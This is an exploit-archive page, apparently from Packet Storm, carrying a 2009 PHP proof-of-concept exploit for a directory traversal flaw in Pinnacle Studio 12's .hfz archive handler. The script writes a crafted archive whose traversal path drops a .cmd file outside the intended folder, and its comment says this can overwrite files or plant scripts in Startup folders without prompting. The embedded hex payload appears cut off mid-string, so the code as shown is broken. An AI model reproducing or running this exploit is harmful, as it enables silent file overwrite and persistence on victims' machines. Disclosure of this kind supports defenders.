exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Pinnacle Studio 12 Directory Traversal

Pinnacle Studio 12 Directory Traversal
Posted May 13, 2009
Authored by Nine:Situations:Group | Site retrogod.altervista.org

Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal proof of concept exploit.

tags | exploit, proof of concept, file inclusion
SHA-256 | 140e18b7f263c208877fbd4b9e099be7be793ab75d118fc919ff39ed4291ab12

Pinnacle Studio 12 Directory Traversal

Change Mirror Download
<?php
/*
Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis

Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/

Some keys exported from the registry:

[HKEY_CLASSES_ROOT\.hfz]
@="hfzfile"

[HKEY_CLASSES_ROOT\.hfz\hfzfile]

[HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]

[HKEY_CLASSES_ROOT\hfzfile]
@="Hollywood FX Compressed Archive"

[HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
@="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"

[HKEY_CLASSES_ROOT\hfzfile\shell]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
@="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
00,22,00,00,00,00,00

Usually files are decompressed in a Pinnacle effects folder...
Problem is ... that .hfz files can be used to overwrite files on the target system
or placing scripts in Startup folders by directory traversal attacks
and InstallHFX.exe decompresses them with no prompts!
Just modified an existing .hfz file and here it is the dump ...
Also I experienced some crashes in doing this... investigating...

*/

$____path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd";

$____payload = "\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00". "\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a". "\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b". "\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04". "\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb". "\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2". "\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51". "\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2". "\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5". "\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99". "\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93". "\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0". "\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3". "\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd6". "\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27". "\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4". "\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c". "\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc". "\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9". "\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19". "\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5". "\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09". "\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80". "\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26". "\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a". "\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e". "\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97". "\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b". "\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1\xf4\x69\x09\x3c\x44\x0a\x0b\xff". "\x22\x60\x7a\x7a\x3c\x44\x01\xe7\x86\x0d\x33\xe4\x29\x56\xf7\x01". "\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3". "\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b". "\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48". "\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32". "\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef". "\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91". "\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90". "\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08". "\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65". "\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf". "\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c". "\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac". "\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78". "\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54". "\x82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c". "\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f". "\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e". "\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0". "\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60". "\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9". "\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3". "\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e". "\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82". "\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8". "\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e". "\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3". "\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34". "\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59". "\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe5\x9d\xed\xef\x9f\x95\xed". "\xa8\x90\xe2\xe2\x69\x72\x50\x04\x1b\x88

$_f = fopen("puf.hfz", "w+");

fputs($_f, $____payload);

fclose($_f);

?>


Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    9 Files
  • 7
    Feb 7th
    32 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close